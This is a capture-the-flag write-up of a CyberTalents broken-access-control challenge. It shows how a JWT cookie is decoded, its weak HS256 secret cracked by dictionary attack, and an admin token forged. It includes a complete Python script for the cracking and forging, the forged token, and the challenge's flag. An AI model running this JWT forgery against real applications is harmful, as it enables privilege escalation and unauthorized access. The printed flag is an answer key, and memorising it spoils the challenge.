Challenge Name: admin gate first

Mohamed Samir
3 min read · Oct 14, 2024


Flag is safe in the admin account info

Challenge link → admin gate first » CyberTalents

The challenge name and description already tell us what is expected: "admin gate first" and "flag is safe in the admin account info" point to a Broken Access Control vulnerability, which means we will have to get the application to treat us as the admin account. So let's first recall what Broken Access Control is.

Broken Access Control is a security vulnerability that occurs when an application does not properly enforce user permissions, allowing unauthorized users to access resources, functions, or data they shouldn’t be able to. This flaw is commonly found in web applications and is a serious issue because it can lead to data breaches, privilege escalation, and unauthorized system control.

Let’s get back to our challenge:

The challenge page is a simple login interface with two input fields, and at the top of the page it hands us a credential:

User: test

Pass: test

Log in with the given credential.

I've solved this challenge on TryHackMe before, and its main idea is changing the username and the role, but it's not that easy: the username and role live inside a token that is encoded (not encrypted), as we'll see after opening the challenge in Firefox and using the developer tools, which give us more control:

Then open the Storage tab and look at the Cookies:

In the cookies we find a JWT. It has three parts separated by dots: header, payload and signature (highlighted in three different colors in the screenshot). The first two are base64url-encoded JSON, not ciphertext, so we can decode them from a Kali terminal with the following command:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcInRlc3RcIixcInJvbGVcIjpcInVzZXJcIn0ifQ.XSPy0jZd8CEtHl2e3C1SjPaewco1tjO3iajbkJy2OFQ

echo -n '<one segment of the token>' | base64 -d

Note that JWT segments use the base64url alphabet with the '=' padding stripped, so if base64 reports "invalid input" on a segment, replace '-' with '+' and '_' with '/' and append '=' until the length is a multiple of 4.

Decoding the header part gives us:

{"typ":"JWT","alg":"HS256"}

means:

  • The token is a JWT.
  • It uses HMAC-SHA256 as the signing algorithm.

Decoding the payload part the same way gives:

{"data":"{\"username\":\"test\",\"role\":\"user\"}"}

Note that the username and role sit inside a JSON string stored under "data", not as top-level claims. The third part is the HMAC-SHA256 signature over header.payload, and the server only accepts the token if the signature matches the secret it signs with. That secret is 123456; I found it with jwt_tool's dictionary cracking mode.

So we are close to the flag. Because the server verifies the HS256 signature, simply flipping the role from user to admin is not enough: we have to re-encode the edited payload, re-sign header.payload with the recovered secret 123456, put the new token in the cookie and refresh the page to see what happens.

I will edit the text first, then encode it with this command (the tr calls turn standard base64 into the base64url form JWT expects):

echo -n 'your_string' | base64 | tr '+/' '-_' | tr -d '='

The signature cannot be produced with base64 alone; it is HMAC-SHA256 of the new header.payload keyed with 123456, which jwt_tool (or a few lines of code) computes for us.

Edit the JWT Token

{
"typ": "JWT",
"alg": "HS256"
}

{
"data": "{\"username\":\"test\",\"role\":\"admin\"}"
}

the new token:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcInRlc3RcIixcInJvbGVcIjpcImFkbWluXCJ9In0.jHijo7pYELY4DJG20h2xCRiKRqW3HCdB1AnyOGsTNUw
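The whole chain above, decoding the three segments, recovering the HS256 secret by dictionary attack as jwt_tool does, and re-signing the edited payload, as an added example written for this page using only the Python standard library (it is not the author's code and not jwt_tool). The token is the one copied from the cookie earlier; the CANDIDATE_SECRETS list is constructed for the example and stands in for a real wordlist.

```python
import base64
import hashlib
import hmac
import json

# Token taken from the write-up above (the cookie issued for test/test).
ORIGINAL_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJkYXRhIjoie1widXNlcm5hbWVcIjpcInRlc3RcIixcInJvbGVcIjpcInVzZXJcIn0ifQ."
    "XSPy0jZd8CEtHl2e3C1SjPaewco1tjO3iajbkJy2OFQ"
)

# Constructed candidate list for the example; a real run feeds a wordlist.
CANDIDATE_SECRETS = ["secret", "password", "admin", "jwt", "123456", "qwerty"]


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment (RFC 7515): restore the '='
    padding and alphabet that plain `base64 -d` expects."""
    segment = segment.replace("-", "+").replace("_", "/")
    return base64.b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    """Encode as base64url and strip the '=' padding, as JWT requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token: str):
    """Split header.payload.signature and decode the two JSON parts."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload, b64url_decode(sig_b64)


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build header.payload.signature the way an HS256 signer does:
    compact JSON, base64url, HMAC-SHA256 over the ASCII signing input."""
    def compact(obj):
        return json.dumps(obj, separators=(",", ":")).encode()
    signing_input = b64url_encode(compact(header)) + "." + b64url_encode(compact(payload))
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def crack_secret(token: str, candidates):
    """Offline dictionary attack: recompute the HMAC over the token's own
    header.payload bytes for each candidate and compare with its signature.
    The original segments are used unchanged (not re-serialized JSON), since
    the server's key order or whitespace may differ from ours."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    signature = b64url_decode(sig_b64)
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, signature):
            return secret
    return None  # secret not in the wordlist


def forge_admin_token(token: str, secret: str) -> str:
    """Decode, flip the role inside the nested JSON string, and re-sign."""
    header, payload, _ = decode_jwt(token)
    data = json.loads(payload["data"])  # "data" holds a JSON string, not an object
    data["role"] = "admin"
    payload["data"] = json.dumps(data, separators=(",", ":"))
    return sign_hs256(header, payload, secret)


if __name__ == "__main__":
    header, payload, _ = decode_jwt(ORIGINAL_TOKEN)
    print("header :", header)
    print("payload:", payload)
    secret = crack_secret(ORIGINAL_TOKEN, CANDIDATE_SECRETS)
    print("secret :", secret)
    if secret is not None:
        print("forged :", forge_admin_token(ORIGINAL_TOKEN, secret))
```

Run it as a script and paste the printed forged token into the cookie. With the write-up's secret, the payload segment it produces is byte-for-byte the one shown above; the point worth keeping is that cracking must be done over the token's original header.payload bytes, while forging re-serializes the JSON, so a server that signs with different key order or whitespace would still verify our token as long as the secret is right.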

Put the new token into the cookie's value column, refresh the page, and congratulations, you found the flag:

J!W!T#S3cr3T@2018

Happy Hacking :)

Written by Mohamed Samir

second-year Computer Science | Web PenTester | Offensive | Software Tester Trainee at @CLS Learning Solutions | CTF Player at THM | Top 4% on tryhackme